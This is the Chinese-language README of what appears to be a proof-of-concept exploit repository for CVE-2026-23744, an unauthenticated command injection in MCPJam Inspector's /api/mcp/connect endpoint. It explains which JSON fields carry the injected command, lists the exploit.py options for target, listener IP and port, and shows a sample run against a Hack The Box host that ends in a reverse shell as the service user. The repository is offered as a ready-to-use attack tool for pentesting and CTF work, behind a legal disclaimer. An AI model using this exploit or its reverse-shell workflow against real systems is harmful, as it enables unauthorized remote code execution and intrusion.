本概念验证(PoC)仅供授权的安全研究、教育目的和受控实验室环境(例如 HTB、CTF 或经明确书面同意的内部渗透测试)使用。未经许可对任何系统进行未授权使用是非法且不道德的。作者对滥用不承担任何责任;用户应全权负责遵守所有适用法律法规。
CVE-2026-23744 是 MCPJam Inspector(版本 ≤ 1.4.2)中的一个未认证命令注入漏洞。
/api/mcp/connect 端点接受包含 serverConfig.command 和 serverConfig.args 的 JSON 载荷,并直接将其传递给系统进程派生,期间没有任何清理。攻击者可发送精心构造的请求以执行任意系统命令,从而以服务用户权限获得反向 Shell。
本仓库包含一个完整可用的漏洞利用脚本,并带有一个可选的全自动基于 PTY 的交互式监听器(默认启用)。
requests 库(pip install requests)重要提示: 只需提供主机名或 IP。脚本会自动添加 http:// 或 https://
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
| Option | 描述 |
|---|---|
-t, --target | 目标主机名或 IP(必填) |
-p, --port | 目标端口(默认:6274) |
-l, --lhost | 你的 IP,用于反向 Shell(必填) |
-r, --lport | 你的监听端口(默认:4444) |
--ssl | 使用 HTTPS 而非 HTTP |
--check-only | 仅检查漏洞,不发送 Shell |
该脚本会启动自己的监听器,并直接在终端中为你提供一个 Shell。
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!
# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)
root 身份运行。本仓库仅用于教育和授权测试目的。使用风险自负。
作者: Mluex0
日期: 2026 年 8 月